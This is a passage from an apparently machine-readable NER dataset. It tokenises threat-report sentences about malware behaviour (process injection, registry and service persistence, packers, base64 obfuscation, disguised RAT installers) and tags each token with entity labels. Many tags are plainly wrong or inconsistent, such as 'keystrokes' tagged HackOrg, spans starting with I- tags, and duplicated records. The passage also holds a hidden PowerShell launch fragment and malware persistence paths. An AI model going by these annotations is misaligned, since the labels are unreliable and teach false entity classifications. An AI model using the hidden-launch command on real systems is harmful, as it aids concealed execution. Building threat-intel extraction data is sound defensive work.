"inject", "them", "into", "dllhost.exe." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O", "B-Features", "O", "O", "B-SamFile" ] }, { "tokens": [ "It", "is", "also", "able", "to", "communicate", "through", "different", "network", "protocols", "such", "as", "UDP", "(User", "Datagram", "Protocol)", "and", "TCP", "(Transmission", "Control", "Protocol)." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-Way", "B-Way", "O", "O" ] }, { "tokens": [ "Delete", "file" ], "ner_tags": [ "B-SamFile", "I-SamFile" ] }, { "tokens": [ "Delete", "file" ], "ner_tags": [ "B-SamFile", "I-SamFile" ] }, { "tokens": [ "Keystrokes", "and", "windows", "monitoring" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "Monitor", "keystrokes", "and", "windows" ], "ner_tags": [ "I-Features", "B-HackOrg", "O", "O" ] }, { "tokens": [ "Keylogging" ], "ner_tags": [ "O" ] }, { "tokens": [ "will", "check", "if", "the", "running", "processes" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "will", "check", "if", "the", "process", "avp.exe", "exists." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "It", "sets", "up", "a", "run", "key", "for", "via", "the", "command", "C:\\ProgramData\\GoogleUpdate\\googleupdate.exe", "work", "for", "persistence." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "It", "sets", "up", "a", "run", "key", "for", "the", "command", "C:\\programdata\\netsky\\netsky.exe", "online", "for", "persistence." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sets", "Run", "Key", "with", "“work/online”" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "It", "installs", "itself", "by", "creating", "aservice", "called", "InstallSvc", "which", "will", "trigger", "“C:\\programdata\\netsky\\netsky.exe", "online”." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "malware", "first", "generates", "a", "key", "blob", "randomly,", "with", "the", "key", "being", "encrypted", "in", "a", "custom", "algorithm." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Regardless", "of", "whether", "the", "file", "content", "is", "compressed", "or", "not,", "it", "will", "be", "encrypted", "in", "XOR", "operations", "with", "a", "specific", "string" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "is", "another", "example", "of", "custom", "malware", "used", "for", "packing", "files;" ], "ner_tags": [ "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "I-Features", "O" ] }, { "tokens": [ "Victims", "will", "receive", "and", "interact", "with", "a", "decoy", "document", "containing", "a", "Google", "Drive", "link", "and", "a", "corresponding", "password", "instead", "of", "an", "archive", "download", "link", "embedded", "in", "the", "email." ], "ner_tags": [ "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Victims", "will", "receive", "and", "interact", "with", "a", "decoy", "document", "containing", "a", "Google", "Drive", "link", "and", "a", "corresponding", "password", "instead", "of", "an", "archive", "download", "link", "embedded", "in", "the", "email." ], "ner_tags": [ "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "that", "had", "the", "remote", "desktop", "service", "enabled." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "and", "the", "creation", "of", "a", "schedule", "task." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "conceal", "its", "true", "code", "through", "either", "encryption", "or", "compression" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "make", "the", "malicious", "payload", "smaller", "and", "avoid", "detection", "based", "on", "static", "malware", "analysis", "techniques" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "UPX", "is", "an", "open-source", "packing", "algorithm" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MPRESS", "is", "a", "free", "packer." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Andromeda", "is", "a", "custom", "packer" ], "ner_tags": [ "B-SamFile", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "compress", "(and", "if", "it", "has", "the", "functionality", "of", "a", "crypter", "also", "encrypts)", "the", "original", "executable,", "which", "is", "saved", "in", "one", "of", "the", "sections", "of", "the", "final", "packed", "file." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "entry", "point", "of", "the", "original", "file", "is", "relocated,", "and", "so", "is", "the", "Import", "Address", "Table", "(IAT)." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "change", "the", "final", "payload’s", "section", "names," ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "have", "very", "few", "imports", "as", "they", "don’t", "rely", "on", "external", "libraries" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "allocate", "memory,", "change", "permissions,", "read", "the", "encrypted/packed", "chunk", "of", "code,", "decrypt", "it,", "load", "it", "to", "the", "allocated", "memory", "space", "and", "execute", "it" ], "ner_tags": [ "O", "B-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "use", "system", "calls" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "VirtualAlloc", "used", "for", "allocating", "memory", "in", "the", "current", "process" ], "ner_tags": [ "B-SamFile", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "VirtualProtect", "changes", "the", "permissions", "of", "the", "given", "virtual", "address." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RtlDecompressBuffer", "decompresses", "the", "provided", "buffer." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O" ] }, { "tokens": [ "CreateProcessInternalW", "creates", "a", "new", "process." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "can", "create", "a", "new", "threat", "with", "the", "malicious", "unpacked", "payload." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "initial", "code", "usually", "called", "a", "stub,", "decrypts", "or", "decompresses", "the", "real", "code" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "stub", "is", "a", "small", "part", "of", "code", "that", "implements", "the", "decompression", "(and", "decryption)", "of", "the", "originally", "packed", "file" ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "payload", "of", "the", "malware", "can", "be", "part", "of", "the", "loader’s", "file" ], "ner_tags": [ "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "strongly", "indicates", "that", "it", "contains", "another", "component", "that", "is", "dropped/loaded." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "it", "can", "be", "downloaded", "from", "a", "remote", "location", "(by", "the", "loader,", "also", "known", "as", "a", "Downloader)." ], "ner_tags": [ "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "use", "system", "calls" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "VirtualAlloc", "used", "for", "allocating", "memory", "in", "the", "current", "process" ], "ner_tags": [ "B-SamFile", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "VirtualProtect", "changes", "the", "permissions", "of", "the", "given", "virtual", "address" ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RtlDecompressBuffer", "decompresses", "the", "provided", "buffer." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O" ] }, { "tokens": [ "CreateProcessInternalW", "creates", "a", "new", "process" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "not", "see", "them", "in", "the", "imported", "function", "list,", "and", "they", "not", "even", "be", "part", "of", "the", "strings", "in", "the", "sample." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "try", "to", "hide", "these", "system", "calls" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "function", "and", "the", "corresponding", "library", "are", "dynamically", "loaded", "at", "runtime", "–", "also", "known", "as", "explicit", "linking" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "this", "executable", "then", "downloads", "and", "executes", "additional", "payloads" ], "ner_tags": [ "O", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "This", "executable", "binary", "insecurely", "downloads", "and", "executes", "additional", "payloads", "from", "the", "Internet." ], "ner_tags": [ "O", "O", "O", "O", "B-Features", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "Downloading", "and", "running", "further", "executables" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "It", "downloads", "and", "runs", "an", "executable", "payload" ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "B-Features", "O", "O" ] }, { "tokens": [ "This", "is", "a", "Windows", "Native", "Binary", "executable", "embedded", "inside", "of", "UEFI", "firmware", "binary" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "This", "Windows", "executable", "is", "embedded", "into", "UEFI", "firmware" ], "ner_tags": [ "O", "O", "O", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "the", "embedded", "Windows", "executable" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "an", "embedded", "executable" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "This", "executable", "uses", "the", "Windows", "Native", "API" ], "ner_tags": [ "O", "O", "O", "O", "O", "I-Tool", "I-Tool" ] }, { "tokens": [ "It", "then", "sets", "registry", "entries" ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "to", "run", "this", "executable", "as", "a", "Windows", "Service." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "when", "using", "the", "HTTPS-enabled", "options" ], "ner_tags": [ "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "implants", "made", "their", "native", "Windows", "executables", "look", "like", "legitimate", "update", "tools." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "Windows", "payload", "was", "named", "“IntelUpdater.exe”" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Capturing", "screenshots" ], "ner_tags": [ "B-SamFile", "O" ] }, { "tokens": [ "Real-time", "screen", "monitoring" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "a", "legitimate", "tool", "which", "is", "frequently", "used", "by", "bad", "actors", "for", "malicious", "purposes", "in", "ways", "similar", "to", "TeamViewer" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-Purp", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "NetSupport", "Manager,", "used", "maliciously", "or", "otherwise,", "provides", "full", "and", "complete", "control", "over", "the", "target", "device." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "As", "NetSupport", "Manager", "is", "a", "legitimate", "tool", "that", "has", "a", "long", "history", "of", "development,", "it", "is", "highly", "attractive", "to", "attackers", "as", "it", "can", "be", "relied", "on", "to", "work", "‘out", "of", "the", "box’." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "has", "been", "observed", "in", "multiple", "ISO", "files", "masquerading", "as", "legitimate", "software," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "RAT", "installation", "is", "disguised", "to", "look", "similar", "to", "a", "Google", "Chrome", "installation." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RAT", "installer", "disguised", "as", "Google", "Chrome", "setup" ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O" ] }, { "tokens": [ "threat", "actors", "are", "able", "to", "masquerade", "the", "dropper", "or", "installer" ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "The", "sample", "is", "obfuscated", "via", "the", "Babadeda", "crypter." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "a", "base64", "encoded", "string", "is", "used", "to", "specify", "various", "parameters" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features" ] }, { "tokens": [ "Base64", "encoded", "RAT", "execution", "command" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "Persistence", "for", "the", "RAT", "is", "achieved", "via", "registry", "entry,", "and", "a", "shortcut", "to", "the", "installed", "RAT", "executable", "is", "written", "to", "the", "Startup", "folder." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "I-Features", "O", "O", "O", "B-Features", "O", "O", "O", "B-SecTeam", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Persistence", "via", "Scheduled", "Task" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "In", "addition,", "the", "sample", "generates", "a", "scheduled", "task", "with", "multiple", "triggers." ], "ner_tags": [ "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Network", "adapter", "details", "are", "pulled", "via", "GetAdaptersAddresses" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Additional", "data", "is", "gleaned", "via", "WMI", "queries" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "SELECT", "*", "FROM", "Win32_ComputerSystem" ], "ner_tags": [ "B-Way", "B-Way", "O", "O" ] }, { "tokens": [ "all", "running", "processes", "are", "enumerated", "and", "logged", "via", "EnumProcesses", "(32-bit", "processes)." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "has", "the", "ability", "to", "drop", "and", "execute", "additional", "components." ], "ner_tags": [ "O", "O", "O", "O", "B-Features", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "These", "files", "are", "all", "self-deleted", "after", "launch" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "threat", "actors", "using", "this", "tool", "are", "very", "quick", "to", "update", "their", "lures", "and", "find", "ways", "to", "entice", "their", "victims", "into", "installing", "the", "malicious", "remote", "control", "software." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "decoded", "command" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "Downloads", "the", "miner", "and", "watcher." ], "ner_tags": [ "B-SamFile", "O", "B-HackOrg", "O", "O" ] }, { "tokens": [ "then", "a", "malware", "downloader", "is", "uploaded", "to", "the", "device" ], "ner_tags": [ "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Reconfigures", "Windows", "Defender", "to", "exclude", "the", "user", "profile", "path", "and", "the", "entire", "system", "drive", "from", "scanning." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "its", "“intelligent”", "way", "of", "brute", "forcing:", "it", "checks", "the", "prompt", "and,", "based", "on", "the", "prompt,", "it", "selects", "the", "appropriate", "credentials." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "This", "method", "speeds", "up", "the", "brute", "forcing", "process" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "“intelligent", "brute", "forcing”" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "then", "determines", "the", "processor", "architecture" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "Is", "able", "to", "steal/gather", "information", "on", "CPU", "type,", "screen", "resolution" ], "ner_tags": [ "O", "O", "O", "B-SamFile", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "downloading", "of", "the", "actual", "malware", "is", "done", "via", "a", "variety", "of", "possible", "commands", "(for", "example,", "wget,", "curl,", "tftp", "and", "ftpget)." ], "ner_tags": [ "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Features", "B-Way", "O", "B-Way" ] }, { "tokens": [ "via", "the", "shell", "“echo”", "commands." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "keystroke" ], "ner_tags": [ "O" ] }, { "tokens": [ "download", "a", "malicious", "file" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "executes", "a", "malicious", "script" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "JavaScript", "is", "the", "module", "that", "has", "to", "be", "manually", "executed", "by", "the", "victim," ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "zip", "archive" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "comes", "with", "an", "embedded", "PE", "payload" ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "PE", "is", "stored", "as", "a", "Base64", "encoded", "string" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "stored", "as", "a", "list", "of", "registry", "keys,", "yet", "we", "also", "observed", "a", "variant", "in", "which", "similar", "content", "was", "written", "into", "a", "TXT", "file." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "obfuscated", "Powershell", "script", "that", "runs", "another", "Base64", "obfuscated", "layer", "that", "finally", "decodes", "the", ".NET", "payload." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "embedded", "inside", "as", "a", "base64", "encoded", "buffer" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "In", "its", "resources", "we", "can", "find", "another", "PE" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "been", "obfuscated", "in", "order", "to", "hide", "its", "real", "intentions" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Base64", "encoded", "string,", "and", "in", "the", "other", "as", "a", "hexadecimal", "string" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PE", "file", "was", "encoded", "as", "an", "obfuscated", "hexadecimal", "string." ], "ner_tags": [ "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Base64", "encoded", "script" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Base64" ], "ner_tags": [ "O" ] }, { "tokens": [ "obfuscated", "by", "XOR" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "three", "layers", "where", "one", "decodes", "content", "for", "the", "next" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "decodes", "the", "next", "element:" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "deobfuscates", "and", "runs", "another", "block", "of", "code" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "deobfuscate", "it." ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "decodes", "it" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "deobfuscate", "the", "file" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "decoding" ], "ner_tags": [ "O" ] }, { "tokens": [ "decoding" ], "ner_tags": [ "O" ] }, { "tokens": [ "Decoded", "content" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "Decoded", "content" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "deobfuscates" ], "ner_tags": [ "O" ] }, { "tokens": [ "was", "decoded" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "decoding", "the", "base64-encoded", "content," ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "decompressed" ], "ner_tags": [ "O" ] }, { "tokens": [ "reading/writing", "registry", "keys" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "written", "to", "the", "registry,", "as", "a", "list", "of", "keys." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "JavaScript", "fetched", "from", "the", "C2", "server" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "downloaded", "code", "chunk" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "GET", "request", "with", "C2", "server" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "Process", "Hollowing", "–", "one", "of", "the", "classic", "methods", "of", "PE", "injection" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "PE", "injection,", "manual", "loading", "into", "the", "parent", "process" ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "fetches", "IcedID", "from", "a", "remote", "resource" ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Malicious", "OneNote", "attachment" ], "ner_tags": [ "O", "O", "B-SamFile" ] }, { "tokens": [ "The", "“Forked”", "version", "of", "the", "malware", "loader", "first", "appeared", "in", "February", "2023,", "distributed", "directly", "through", "thousands", "of", "personalized", "invoice-themed", "phishing", "emails." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Time", "B-Exp", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "These", "messages", "used", "Microsoft", "OneNote", "attachments", "(.one)", "to", "execute", "a", "malicious", "HTA", "file" ], "ner_tags": [ "O", "O", "O", "I-SamFile", "B-SecTeam", "B-SecTeam", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "string-decryption", "code" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "sending", "basic", "host", "info", "to", "the", "C2" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "took", "place", "over", "an", "unencrypted", "HTTP", "channel,", "the", "network", "traffic", "was", "plainly", "visible." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "I-Way", "I-Way", "O", "O", "O" ] }, { "tokens": [ "When", "the", "user", "double", "clicks", "or", "opens", "the", "lnk", "file," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "lures", "the", "user", "to", "open", "a", "document.lnk", "file", "which", "will", "execute", "the", "malicious", "DLL", "loader" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "execution", "phase", "started", "with", "that", "password", "protected", "zip,", "which", "after", "extracting", "would", "show", "the", "user", "an", "ISO", "file", "that", "after", "the", "user", "double", "clicks" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "starts", "a", "hidden", "file", "in", "the", "directory" ], "ner_tags": [ "O", "O", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "then", "proceeded", "to", "inject", "into", "various", "other", "processes", "on", "the", "host", "(explorer.exe,", "rundll32.exe)." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile" ] }, { "tokens": [ "From", "these", "injected", "processes," ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "the", "different", "processes", "they", "injected", "into" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "a", "process", "where", "Cobalt", "Strike", "was", "injected", "into" ], "ner_tags": [ "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "The", "process", "injection", "technique", "was", "used", "multiple", "times", "to", "inject", "into", "different", "processes" ], "ner_tags": [ "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "Almost", "every", "post-exploitation", "job", "was", "launched", "from", "an", "injected", "process." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "a", "process", "where", "the", "threat", "actors", "injected:" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "where", "they", "were", "previously", "injected", "into" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Threat", "actors", "performed", "the", "first", "lateral", "movement", "from", "the", "beachhead", "to", "the", "server", "using", "RDP", "with", "an", "Administrator", "account" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "previously", "injected", "into" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Process", "injections", "in", "svchost", "process", "via", "CreateRemoteThread,", "Default", "named", "pipes,", "etc" ], "ner_tags": [ "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "processes", "which", "threat", "actors", "injected", "into:" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "After", "injecting", "into", "various", "processes", "on", "the", "host," ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "various", "injections", "across", "hosts" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "injected", "into", "multiple", "processes", "on", "different", "hosts." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "threat", "actors", "began", "discovery", "tasks", "using", "Windows", "utilities" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "These", "batch", "scripts’", "purposes" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "then", "two", "batch", "scripts", "were", "dropped", "and", "run." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "using", "the", "following", "command", "line:", "C:\\Windows\\System32\\cmd.exe", "/c" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "C:\\Windows\\system32\\cmd.exe", "/C", "powershell.exe", "-nop", "-w", "hidden", "-c" ], "ner_tags": [ "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "O", "O" ] }, { "tokens": [ "launching", "the", "getsystem", "command", "in", "the", "wrong", "console", "(shell", "console", "rather", "than", "the", "beacon", "console)." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "C:\\Windows\\system32\\cmd.exe", "/C", "getsystem" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "cmd.exe", "/C" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "C", ":\\Windows\\system32\\cmd.exe", "/C", "shell" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "Threat", "actors", "used", "two", "scripts", "named", "s.bat", "(for", "servers)", "and", 